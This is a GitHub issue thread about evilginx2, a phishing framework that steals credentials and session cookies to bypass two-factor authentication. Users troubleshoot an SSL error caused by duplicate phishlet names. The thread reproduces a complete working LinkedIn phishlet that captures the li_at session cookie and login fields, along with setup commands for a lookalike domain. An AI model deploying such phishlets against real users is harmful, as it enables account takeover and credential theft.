search

kgretzky / evilginx2

Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies, allowing for the bypass of 2-factor authentication
BSD 3-Clause "New" or "Revised" License
10.72k stars 1.94k forks source link

Received ERR_SSL_PROTOCOL_ERROR in Chrome #95

Closed anicec4t closed 5 years ago

anicec4t commented 5 years ago

The phish link is responding with "ERR_SSL_PROTOCOL_ERROR" in chrome for different web sites... any clues?

kgretzky commented 5 years ago

More info?

anicec4t commented 5 years ago

I've done some phishlets for some client and when I test them Chrome gives me ERR_SSL_PROTOCOL_ERROR In the framework console of evilginx2 there is no message like "new visitor".....

anicec4t commented 5 years ago

Can be because the phishlets are maybe not done right? or not complete?

kgretzky commented 5 years ago

What phishlets? What version? I have nothing to work with here.

anicec4t commented 5 years ago

evilginx version 2.0 the phishlet was created by me. it is not a phishlet already included in the framework

anicec4t commented 5 years ago

any clue how to check if my phishlet is done right so we can exclude that?

anicec4t commented 5 years ago

found out where the problem is. I will come up with a detailed view in a few minutes

anicec4t commented 5 years ago

Okay so the problem is when you create new yaml phishlets using pico (as I did) after you save them pico adds an extra byte to the file causing the evilginx server to ac strange.

I tested as follows: test 1: using the linkedin.yaml included in the framework - all went well test 2: cat the linkedin.yaml and copy paste the output to a file called test2.yaml - both of the files looked the same when did the cat - received the SSL error

kgretzky commented 5 years ago

Isn't it because you have two phishlets running with same configuration and evilginx sends a wrong cert for wrong domain? It would help if you pasted the full error.

anicec4t commented 5 years ago

This site can’t provide a secure connection www.testtting-domain.online sent an invalid response. ERR_SSL_PROTOCOL_ERROR

kgretzky commented 5 years ago

I'm sure there are more details to this error if you look carefully.

anicec4t commented 5 years ago

this is the full error tests were done using same linkedin phishlet also before activating the phishlet I did the phishlet disable name command

anicec4t commented 5 years ago

Nope. that is the only error chrome does no show more or details :(

anicec4t commented 5 years ago

Firefox gives: Secure Connection Failed

An error occurred during a connection to www.handler-mobile.online. SSL received a record that exceeded the maximum permissible length. Error code: SSL_ERROR_RX_RECORD_TOO_LONG

The page you are trying to view cannot be shown because the authenticity of the received data could not be verified.
Please contact the website owners to inform them of this problem.
anicec4t commented 5 years ago

Check this and see: https://www.handler-mobile.online/uas/login?yf=5dc0&ns=aHR0cHM6Ly9nb29nbGUuY29tLw%3D%3D

anicec4t commented 5 years ago

Output of evil.. [12:41:19] [+++] successfully set up SSL/TLS certificates for domains: [www.handler-mobile.online] : phishlets hostname sure handler-mobile.online [12:41:33] [inf] phishlet 'sure' hostname set to: handler-mobile.online [12:41:33] [inf] disabled phishlet 'sure' : phishlets enable sure [12:41:33] [inf] enabled phishlet 'sure' [12:41:33] [inf] setting up certificates for phishlet 'sure'... [12:41:33] [+++] successfully set up SSL/TLS certificates for domains: [www.handler-mobile.online] : phishlets get-url sure https://google.com/

anicec4t commented 5 years ago

If you have the sub_filters: not complete can that cause the error?

kgretzky commented 5 years ago

So you say that example phishlets work fine, but just not the one you made yourself? Phishlets validation is coming in version 2.2, which is few weeks away.

anicec4t commented 5 years ago

This one used now is a copy paste of the included one of linkedin

anicec4t commented 5 years ago

what I was asking was. If I create a phishlet for x web site and for some reason I don't make it complete (let's say I don't add action= ..) can this be the cause of that error, in the case that the YAML file is written sintax right.

anicec4t commented 5 years ago

cbc8b6f0dd29a53c5487449d9501f540 linkedin.yaml cbc8b6f0dd29a53c5487449d9501f540 sure.yaml

linkedin.yaml

name: 'linkedin'
author: '@mrgretzky'
min_ver: '2.0.0'
proxy_hosts:
  - {phish_sub: 'www', orig_sub: 'www', domain: 'linkedin.com', session: true, is_landing: true}
sub_filters:
  - {hostname: 'www.linkedin.com', sub: 'www', domain: 'linkedin.com', search: 'action="https://{hostname}', replace: 'action="https://{hostname}', mimes: ['text/html', 'application/json']}
  - {hostname: 'www.linkedin.com', sub: 'www', domain: 'linkedin.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json']}
  - {hostname: 'www.linkedin.com', sub: 'www', domain: 'linkedin.com', search: '//{hostname}/nhome/', replace: '//{hostname}/nhome/', mimes: ['text/html', 'application/json']}
auth_tokens:
  - domain: 'www.linkedin.com'
    keys: ['li_at']
user_regex:
  key: 'session_key'
  re: '(.*)'
pass_regex:
  key: 'session_password'
  re: '(.*)'
landing_path:
  - '/uas/login'

sure.yaml

name: 'linkedin'
author: '@mrgretzky'
min_ver: '2.0.0'
proxy_hosts:
  - {phish_sub: 'www', orig_sub: 'www', domain: 'linkedin.com', session: true, is_landing: true}
sub_filters:
  - {hostname: 'www.linkedin.com', sub: 'www', domain: 'linkedin.com', search: 'action="https://{hostname}', replace: 'action="https://{hostname}', mimes: ['text/html', 'application/json']}
  - {hostname: 'www.linkedin.com', sub: 'www', domain: 'linkedin.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json']}
  - {hostname: 'www.linkedin.com', sub: 'www', domain: 'linkedin.com', search: '//{hostname}/nhome/', replace: '//{hostname}/nhome/', mimes: ['text/html', 'application/json']}
auth_tokens:
  - domain: 'www.linkedin.com'
    keys: ['li_at']
user_regex:
  key: 'session_key'
  re: '(.*)'
pass_regex:
  key: 'session_password'
  re: '(.*)'
landing_path:
  - '/uas/login'
anicec4t commented 5 years ago

[12:58:03] [inf] setting up certificates for phishlet 'sure'... [12:58:03] [+++] successfully set up SSL/TLS certificates for domains: [www.handler-mobile.online] : phishlets hostname sure handler-mobile.online [12:58:10] [inf] phishlet 'sure' hostname set to: handler-mobile.online [12:58:10] [inf] disabled phishlet 'sure' : phishlets enable sure [12:58:10] [inf] enabled phishlet 'sure' [12:58:10] [inf] setting up certificates for phishlet 'sure'... [12:58:10] [+++] successfully set up SSL/TLS certificates for domains: [www.handler-mobile.online] : phishlets get-url sure https://google.com/

https://www.handler-mobile.online/uas/login?yf=5dc0&ns=aHR0cHM6Ly9nb29nbGUuY29tLw%3D%3D

anicec4t commented 5 years ago

same error Chrome: This site can’t provide a secure connection www.handler-mobile.online sent an invalid response. ERR_SSL_PROTOCOL_ERROR

kgretzky commented 5 years ago

What phishlets do you have enabled when this error appears?

anicec4t commented 5 years ago

hi, i used the linkedin one

kafkaesqu3 commented 5 years ago

Hey i'm getting this error also with a custom phishlet i have been working on. I did a PCAP on my test machine and my evilginx server; it looks like the evilginx server is sending a 502 bad gateway response when the client sends the TLS Client Hello.

The issue appears on Chrome/Firefox on Mac/Windows hosts.

My evilginx is running on Ubuntu 18.04.1

Nothing is printed in debug log, and the issues happens in normal mode as well as developer mode.

My phishlet is the only one enabled.

This is causing some head scratches between me and a few friends who have tried troubleshooting.

I would be happy to share my phishlet with you via PM or email, or any other information which can be helpful to you. It's possible the issue is in my phishlet; it's the first one I've written.

EDIT: Alright, looks like i solved this one right after posting. I love it when that happens! I was testing a few variations of my phishlet, each of them had the same name. As soon as I changed the phishlet name, it started working. Duplicate phishlet names=bad

anicec4t commented 5 years ago

so what you are saying is that if a phishlet is not done right and has the name "aaa" if you edit it and reload evilginx, it will give you same error. so you have to rename it after edit to aaa1 right?

kgretzky commented 5 years ago

@kafkaesqu3 Glad to hear that fixed it :)

Version 2.2.0 is adding a lot of phishlet validation, but it seems I need to also add a check for duplicate phishlet names. Thanks.

kgretzky commented 5 years ago

I think it is wiser to just remove the name variable from phishlet file format and instead rely on the name of the filename without .yaml extension. Filenames will provide the uniqueness which is required and will decrease the confusion, making it all less error prone for phishlet creators. Too easy to make this mistake now.